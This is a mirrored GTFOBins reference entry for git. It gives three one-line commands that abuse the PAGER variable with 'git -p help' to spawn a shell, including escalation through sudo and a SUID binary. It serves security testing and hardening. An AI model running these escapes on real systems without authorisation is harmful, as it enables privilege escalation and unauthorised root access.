mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
10 lines
221 B
Markdown
10 lines
221 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: PAGER='sh -c "exec sh 0<&1"' git -p help
|
|
sudo:
|
|
- code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
|
|
limited-suid:
|
|
- code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
|
|
---
|